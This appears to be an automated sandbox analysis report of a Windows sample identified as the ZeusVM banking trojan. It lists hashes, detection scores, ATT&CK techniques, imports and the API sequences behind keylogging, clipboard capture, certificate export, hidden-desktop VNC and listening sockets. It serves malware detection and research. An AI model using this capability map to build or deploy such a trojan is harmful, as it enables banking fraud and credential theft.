Analysis Report 7FzERy9xWc

Overview

General Information

Sample Name:7FzERy9xWc (renamed file extension from none to exe)
Analysis ID:385074
MD5:8f250f634de721fec7b002a805dddc24
SHA1:8e177de1f0ec9d45417b27e47973b8ded74242c7
SHA256:5971fcdcf0f563f502c8ab017f34567c15e3e76c7a3c1497ae8513c305f77798
Tags:uncategorized
Infos:

Detection

ZeusVM
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
May initialize a security null descriptor
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 7FzERy9xWc.exe (PID: 2788 cmdline: 'C:\Users\user\Desktop\7FzERy9xWc.exe' MD5: 8F250F634DE721FEC7B002A805DDDC24)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 7FzERy9xWc.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: 7FzERy9xWc.exeVirustotal: Detection: 87%
Source: 7FzERy9xWc.exeReversingLabs: Detection: 92%
Machine Learning detection for sample
Source: 7FzERy9xWc.exeJoe Sandbox ML: detected
Source: 0.0.7FzERy9xWc.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
Source: 0.2.7FzERy9xWc.exe.400000.0.unpackAvira: Label: TR/Spy.Gen
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00412470 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00412470
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041FB50 HeapAlloc,CryptUnprotectData,LocalFree,HeapFree,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,0_2_0041FB50
Source: 7FzERy9xWc.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040FEA0 GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,PathCombineW,VirtualFree,CloseHandle,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,VirtualFree,CloseHandle,0_2_0040FEA0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004185D0 PathCombineW,MultiByteToWideChar,PathRemoveFileSpecW,PathCombineW,PathCombineW,SetFileAttributesW,FindFirstFileW,DeleteFileW,PathCombineW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_004185D0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00418700 PathCombineW,FindFirstFileW,WaitForSingleObject,PathMatchSpecW,Sleep,PathCombineW,Sleep,FindNextFileW,FindClose,0_2_00418700
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00414C40 select,recv,0_2_00414C40
Source: 7FzERy9xWc.exeString found in binary or memory: http://www.google.com/webhp
Source: 7FzERy9xWc.exe, 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmpString found in binary or memory: http://www.google.com/webhpbcSeShutdownPrivilege
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004239D0 GetClipboardData,WaitForSingleObject,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,0_2_004239D0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00423840 WaitForSingleObject,EnterCriticalSection,GetTickCount,LeaveCriticalSection,TranslateMessage,GetKeyboardState,ToUnicode,TranslateMessage,0_2_00423840
Source: 7FzERy9xWc.exe, 00000000.00000002.201329272.000000000077A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041A850 lstrcmpiA,lstrcmpiA,lstrcmpiA,setsockopt,WSAIoctl,HeapFree,select,WSASetLastError,HeapAlloc,SetLastError,HeapFree,HeapFree,CreateThread,shutdown,closesocket,WaitForMultipleObjects,CloseHandle,HeapFree,HeapFree,HeapFree,HeapFree,ReleaseMutex,CloseHandle,HeapFree,0_2_0041A850
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041A370 send,OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,CloseDesktop,CloseWindowStation,0_2_0041A370
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00412C70 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,0_2_00412C70
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041D940 VirtualFree,CloseHandle,CreateMutexW,GetLastError,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,OpenMutexW,GetFileAttributesExW,ReadProcessMemory,CloseHandle,Sleep,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ReleaseMutex,CloseHandle,HeapFree,0_2_0041D940
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040E230 ExitWindowsEx,InitiateSystemShutdownExW,ExitWindowsEx,0_2_0040E230
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040AC100_2_0040AC10
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004140B00_2_004140B0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004149900_2_00414990
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00416E100_2_00416E10
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00408E300_2_00408E30
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004022C30_2_004022C3
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00416AB00_2_00416AB0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004123600_2_00412360
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004123740_2_00412374
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040F3FD0_2_0040F3FD
Source: 7FzERy9xWc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal72.bank.troj.winEXE@1/0@0/0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00423460 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,0_2_00423460
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004232A0 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertCloseStore,PFXExportCertStoreEx,PFXExportCertStoreEx,HeapAlloc,PFXExportCertStoreEx,CharLowerW,GetSystemTime,HeapFree,CertCloseStore,0_2_004232A0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004129B0 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,0_2_004129B0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00412930 CreateToolhelp32Snapshot,Thread32First,Thread32Next,Thread32Next,CloseHandle,0_2_00412930
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00420440 CoCreateInstance,HeapFree,0_2_00420440
Source: C:\Users\user\Desktop\7FzERy9xWc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00409CFB push eax; iretd 0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00409C70 push eax; iretd 0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00402C19 push cs; iretd 0_2_00402C28
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00409CB9 push eax; iretd 0_2_00409CDD
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040254D push es; iretd 0_2_0040255C
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00402BE3 push cs; ret 0_2_00402BF8
Source: initial sampleStatic PE information: section name: .text entropy: 7.96218490454
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041E910 VirtualProtect,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_0041E910
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: 7FzERy9xWc.exe, 00000000.00000002.201329272.000000000077A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00409D89 mov eax, dword ptr fs:[00000030h]0_2_00409D89
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041C4F0 mov edx, dword ptr fs:[00000030h]0_2_0041C4F0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041CAF0 HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetCurrentProcessId,0_2_0041CAF0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00415510 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,0_2_00415510
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_004234C0 PFXImportCertStore,GetSystemTime,0_2_004234C0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0040C999 HeapFree,GetUserDefaultUILanguage,GetModuleFileNameW,GetUserNameExW,0_2_0040C999
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00410960 GetTimeZoneInformation,0_2_00410960
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_0041D000 GetComputerNameW,GetVersionExW,0_2_0041D000
Source: 7FzERy9xWc.exeBinary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: 7FzERy9xWc.exeString found in binary or memory: RFB 003.003
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00415030 socket,bind,listen,closesocket,0_2_00415030
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00406D40 WaitForSingleObject,socket,bind,GetTickCount,socket,bind,listen,closesocket,CreateEventW,WSAEventSelect,CloseHandle,shutdown,closesocket,getsockname,shutdown,closesocket,CloseHandle,0_2_00406D40
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00414EE0 socket,bind,listen,closesocket,0_2_00414EE0
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00414F40 socket,socket,bind,GetTickCount,socket,bind,listen,closesocket,0_2_00414F40
Source: C:\Users\user\Desktop\7FzERy9xWc.exeCode function: 0_2_00415320 socket,bind,closesocket,0_2_00415320

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts 1 | Native API 1 | Create Account 1 | Valid Accounts 1 | Valid Accounts 1 | Input Capture 21 | Network Share Discovery 1 | Remote Desktop Protocol 1 | Input Capture 21 | Exfiltration Over Other Network Medium | Encrypted Channel 2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
Default Accounts | Scheduled Task/Job | Valid Accounts 1 | Access Token Manipulation 11 | Access Token Manipulation 11 | LSASS Memory | System Time Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Remote Access Software 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Application Shimming 1 | Application Shimming 1 | Obfuscated Files or Information 2 | Security Account Manager | Security Software Discovery 11 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Ingress Tool Transfer 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Install Root Certificate 1 | NTDS | Process Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 3 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 3 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
7FzERy9xWc.exe | 88% | Virustotal | | Browse
7FzERy9xWc.exe | 92% | ReversingLabs | Win32.Trojan.Zeus |
7FzERy9xWc.exe | 100% | Avira | TR/Spy.Gen |
7FzERy9xWc.exe | 100% | Joe Sandbox ML | |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label | Link | Download
0.0.7FzERy9xWc.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen | | Download File
0.2.7FzERy9xWc.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen | | Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:385074
Start date:11.04.2021
Start time:15:49:45
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 45s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:7FzERy9xWc (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal72.bank.troj.winEXE@1/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 32.2% (good quality ratio 30.7%)
  • Quality average: 80.9%
  • Quality standard deviation: 25.6%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:MS-DOS executable
Entropy (8bit):7.912987012643321
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.94%
  • DOS Executable Borland Pascal 7.0x (2037/25) 0.02%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • VXD Driver (31/22) 0.00%
File name:7FzERy9xWc.exe
File size:188928
MD5:8f250f634de721fec7b002a805dddc24
SHA1:8e177de1f0ec9d45417b27e47973b8ded74242c7
SHA256:5971fcdcf0f563f502c8ab017f34567c15e3e76c7a3c1497ae8513c305f77798
SHA512:d42a259868824429c4d6c7ed4aa5de1ddb3805d300feb39b51480a5232c0c05a74d9f27266ce60a796545f23e5de75896a8aa871ed93e5ab73ec01647175c191
SSDEEP:3072:k8pY9M8j32Jwk95kLvkIuBEn/VnEXC1gDtfgBtW8cNhSw4L7Qpo977jurOC:k9j3SwOucIWX1fI6NATF9n6rp
File Content Preview:MZ..............................................................................................................................................................................................................................PE..L...YJ.P...................

File Icon

Icon Hash:00828e8e8686b000

Static PE Info

General

Entrypoint:0x41dd30
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:0x50164A59 [Mon Jul 30 08:48:25 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:87b3a93d03af93f2e664ed65d7224e1a

Entrypoint Preview

Instruction
push 00409D4Bh
ret
or al, FCh
adc al, ADh
xchg eax, ecx
mov esp, C114C940h
add ecx, dword ptr [edi-62h]
push edx
xchg eax, edx
jmp 00007F50B208EC5Fh
cmc
fldcw word ptr [edx-71h]
paddsw mm5, qword ptr [ebp+79725C5Dh]
aas
cmp bl, byte ptr [ecx+edi*2]
clc

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2a364 | 0x118 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x30000 | 0x1eb4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x5a0 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2b244 | 0x2b400 | False | 0.956478052746 | data | 7.96218490454 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x2d000 | 0x2054 | 0x400 | False | 0.2080078125 | data | 1.53050726795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x30000 | 0x23f4 | 0x2400 | False | 0.709418402778 | data | 6.27055584577 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLLImport
KERNEL32.dllHeapDestroy, HeapCreate, Thread32Next, ReadFile, GetTimeZoneInformation, MultiByteToWideChar, GetTempPathW, GetFileSizeEx, OpenMutexW, VirtualAlloc, VirtualProtectEx, VirtualAllocEx, FindClose, LoadLibraryA, RemoveDirectoryW, FindNextFileW, VirtualProtect, CreateToolhelp32Snapshot, GetFileTime, FileTimeToLocalFileTime, GetVolumeNameForVolumeMountPointW, DeleteFileW, GetFileInformationByHandle, GetSystemTime, WriteProcessMemory, GetNativeSystemInfo, GetThreadContext, GetProcessId, GetFileAttributesExW, GetCurrentThreadId, TlsGetValue, TlsSetValue, TerminateProcess, GetCommandLineW, SetErrorMode, GetComputerNameW, OpenEventW, DuplicateHandle, GetCurrentProcessId, GlobalLock, GlobalUnlock, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, TlsAlloc, TlsFree, CreateRemoteThread, Process32FirstW, Process32NextW, SetFileAttributesW, WTSGetActiveConsoleSessionId, ReadProcessMemory, VirtualFreeEx, WideCharToMultiByte, Thread32First, OpenProcess, VirtualQueryEx, SetFileTime, IsBadReadPtr, GetProcessHeap, lstrcmpiA, LoadLibraryW, VirtualFree, HeapFree, SetFilePointerEx, SystemTimeToFileTime, HeapAlloc, CreateProcessW, SetEndOfFile, FindFirstFileW, CreateMutexW, HeapReAlloc, GetTempFileNameW, FileTimeToDosDateTime, GetEnvironmentVariableW, LocalFree, SetThreadContext, GetVersionExW, CreateDirectoryW, FreeLibrary, ExitProcess, SetThreadPriority, GetCurrentThread, ExpandEnvironmentStringsW, GetUserDefaultUILanguage, lstrcmpiW, GetModuleFileNameW, Sleep, GetTickCount, MoveFileExW, ResetEvent, SetLastError, GetLastError, SetEvent, EnterCriticalSection, GetProcAddress, GetPrivateProfileIntW, FlushFileBuffers, CreateFileW, GetFileAttributesW, LeaveCriticalSection, InitializeCriticalSection, WriteFile, GetPrivateProfileStringW, GetModuleHandleW, CloseHandle, WaitForMultipleObjects, CreateEventW, ReleaseMutex, CreateThread, WaitForSingleObject
USER32.dllSwitchDesktop, DefDlgProcA, DefMDIChildProcA, ReleaseCapture, RegisterClassW, CallWindowProcA, CallWindowProcW, GetMessagePos, DefFrameProcW, RegisterClassA, EndPaint, GetUpdateRgn, GetMessageW, GetWindowDC, FillRect, PostMessageW, GetWindowInfo, DefMDIChildProcW, BeginPaint, GetUpdateRect, IntersectRect, GetDCEx, PostThreadMessageW, EqualRect, PrintWindow, ToUnicode, DefWindowProcW, IsRectEmpty, CharLowerBuffA, CreateDesktopW, SetProcessWindowStation, GetWindowRect, GetParent, GetKeyboardState, GetClassLongW, GetAncestor, SetWindowPos, IsWindow, MapWindowPoints, RegisterWindowMessageW, GetMenuItemID, SetKeyboardState, GetSubMenu, MenuItemFromPoint, GetMenu, GetMenuItemRect, TrackPopupMenuEx, SystemParametersInfoW, GetClassNameW, GetMenuState, GetMenuItemCount, HiliteMenuItem, EndMenu, GetWindowThreadProcessId, CharLowerW, MapVirtualKeyW, DefWindowProcA, DrawIcon, GetShellWindow, DrawEdge, GetIconInfo, GetCursorPos, RegisterClassExA, SetCapture, GetSystemMetrics, ExitWindowsEx, DefDlgProcW, DefFrameProcA, OpenInputDesktop, GetCapture, GetThreadDesktop, CloseWindowStation, CreateWindowStationW, GetProcessWindowStation, OpenDesktopW, CloseDesktop, SetThreadDesktop, GetUserObjectInformationW, OpenWindowStationW, GetTopWindow, LoadImageW, MsgWaitForMultipleObjects, WindowFromPoint, GetDC, TranslateMessage, GetWindowLongW, CharLowerA, RegisterClassExW, SetCursorPos, GetClipboardData, PeekMessageA, SendMessageW, CharToOemW, DispatchMessageW, GetWindow, SendMessageTimeoutW, SetWindowLongW, CharUpperW, ReleaseDC, PeekMessageW, GetMessageA
ADVAPI32.dllInitiateSystemShutdownExW, EqualSid, ConvertSidToStringSidW, CryptGetHashParam, OpenProcessToken, GetSidSubAuthority, CryptAcquireContextW, OpenThreadToken, GetSidSubAuthorityCount, GetTokenInformation, RegCreateKeyExW, CryptReleaseContext, RegQueryValueExW, CreateProcessAsUserW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetNamedSecurityInfoW, LookupPrivilegeValueW, CryptCreateHash, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegOpenKeyExW, GetSecurityDescriptorSacl, SetSecurityDescriptorSacl, CryptDestroyHash, AdjustTokenPrivileges, RegCloseKey, RegSetValueExW, CryptHashData, IsWellKnownSid, GetLengthSid, RegEnumKeyExW
SHLWAPI.dllPathQuoteSpacesW, PathRenameExtensionW, StrStrIW, StrStrIA, wvnsprintfA, StrCmpNIA, PathMatchSpecW, PathRemoveBackslashW, PathUnquoteSpacesW, PathAddExtensionW, PathCombineW, SHDeleteKeyW, PathSkipRootW, SHDeleteValueW, PathAddBackslashW, PathFindFileNameW, PathIsDirectoryW, wvnsprintfW, UrlUnescapeA, StrCmpNIW, PathIsURLW, PathRemoveFileSpecW
SHELL32.dllShellExecuteW, SHGetFolderPathW, CommandLineToArgvW
Secur32.dllGetUserNameExW
ole32.dllStringFromGUID2, CLSIDFromString, CoUninitialize, CoCreateInstance, CoInitializeEx
GDI32.dllCreateCompatibleDC, SetRectRgn, SaveDC, DeleteDC, SetViewportOrgEx, RestoreDC, CreateDIBSection, GetDeviceCaps, GetDIBits, CreateCompatibleBitmap, GdiFlush, SelectObject, DeleteObject
WS2_32.dllrecv, sendto, select, getaddrinfo, recvfrom, getpeername, listen, send, WSASend, WSAIoctl, connect, WSAAddressToStringW, WSAStartup, shutdown, setsockopt, bind, socket, WSASetLastError, freeaddrinfo, WSAEventSelect, getsockname, accept, WSAGetLastError, closesocket
CRYPT32.dllCertDuplicateCertificateContext, CertEnumCertificatesInStore, CertCloseStore, CertOpenSystemStoreW, CertDeleteCertificateFromStore, CryptUnprotectData, PFXImportCertStore, PFXExportCertStoreEx
WININET.dllInternetQueryOptionA, InternetOpenA, HttpOpenRequestA, InternetSetOptionA, InternetCrackUrlA, InternetQueryOptionW, InternetConnectA, InternetCloseHandle, HttpSendRequestA, HttpAddRequestHeadersA, HttpAddRequestHeadersW, InternetSetStatusCallbackW, GetUrlCacheEntryInfoW, HttpSendRequestW, InternetReadFile, InternetReadFileExA, InternetQueryDataAvailable, HttpSendRequestExW, HttpQueryInfoA, HttpSendRequestExA
OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
NETAPI32.dllNetApiBufferFree, NetUserEnum, NetUserGetInfo

Network Behavior

No network behavior found

System Behavior

General

Start time:15:50:28
Start date:11/04/2021
Path:C:\Users\user\Desktop\7FzERy9xWc.exe
Wow64 process (32bit):true
Commandline:'C:\Users\user\Desktop\7FzERy9xWc.exe'
Imagebase:0x400000
File size:188928 bytes
MD5 hash:8F250F634DE721FEC7B002A805DDDC24
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

Disassembly

Code Analysis

    Executed Functions

    C-Code - Quality: 96%
    			E00409D89(void* _a4, intOrPtr _a8, long _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
    				long _v8;
    				long _v12;
    				intOrPtr _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				intOrPtr _v32;
    				intOrPtr _t182;
    				intOrPtr _t184;
    				signed int _t202;
    				void* _t203;
    				signed int _t206;
    				intOrPtr _t207;
    				intOrPtr _t213;
    				void* _t214;
    				void* _t215;
    				signed int _t219;
    				intOrPtr _t224;
    				signed int _t245;
    				signed int _t249;
    				intOrPtr _t254;
    				signed int _t270;
    				signed int _t272;
    				signed int _t274;
    				signed int* _t275;
    				long _t276;
    				intOrPtr* _t284;
    				intOrPtr* _t286;
    				signed int _t287;
    				long _t288;
    				signed int _t289;
    				signed int _t292;
    				signed int _t296;
    				void* _t302;
    				void* _t303;
    
    				_t206 = 0;
    				_v20 = 0;
    				_v32 = 0x1218b;
    				_v16 = 0x934;
